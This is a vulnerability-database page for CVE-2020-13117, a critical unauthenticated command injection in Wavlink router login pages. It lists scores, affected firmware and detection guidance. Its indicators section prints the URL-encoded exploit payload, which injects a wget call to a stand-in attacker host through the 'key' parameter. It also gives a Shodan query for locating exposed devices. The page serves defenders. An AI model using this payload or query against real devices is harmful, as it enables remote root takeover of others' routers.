cbcvebase.
CVE-2020-13117
published 2021-02-09

CVE-2020-13117: Wavlink WN575A4, WN579X3, and WN530G3A devices through 2020-05-15 allow unauthenticated remote users to inject commands via the key parameter in a login…

PriorityP193critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
68.79%
99.3th percentile
Wavlink WN575A4, WN579X3, and WN530G3A devices through 2020-05-15 allow unauthenticated remote users to inject commands via the key parameter in a login request.

Affected

2 ranges
VendorProductVersion rangeFixed in
wavlinkwn575a4_firmware<= 2020-05-15
wavlinkwn579x3_firmware<= 2020-05-15

Detection & IOCsextracted from sources · hover to see the quote

path/cgi-bin/login.cgi
commandkey=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23
othershodan-query: http.title:"Wi-Fi APP Login"
  • Look for POST requests to /cgi-bin/login.cgi containing shell metacharacters (backtick, semicolon, single-quote) in the 'key' parameter, indicating command injection attempts.
  • The exploit payload URL-encodes shell injection: key=';`wget http://<attacker>;`;# — detect URL-encoded backtick (%60) and semicolon (%3B) sequences in the key parameter of login.cgi POST bodies.
  • Wavlink devices exposed on the internet can be identified via Shodan using the title 'Wi-Fi APP Login'; monitor for exploitation attempts against such assets.
  • Successful exploitation response body contains 'parent.location.replace' — use this as a response-side indicator when correlating with malicious login.cgi POST requests.
  • GreyNoise tagged active in-the-wild scanning for this CVE as 'Wavlink CVE-2020-13117 RCE Attempt' — use GreyNoise tag filtering to identify scanning IPs.
  • ·The vulnerability affects multiple Wavlink device models; confirmed on WN575A4 and WN579X3, but WN530G3A and potentially other products are also listed as affected.
  • ·The injection is unauthenticated and executes as root, making network-exposed Wavlink login pages an immediate critical risk requiring no prior credentials.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
vendor_oracle7.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.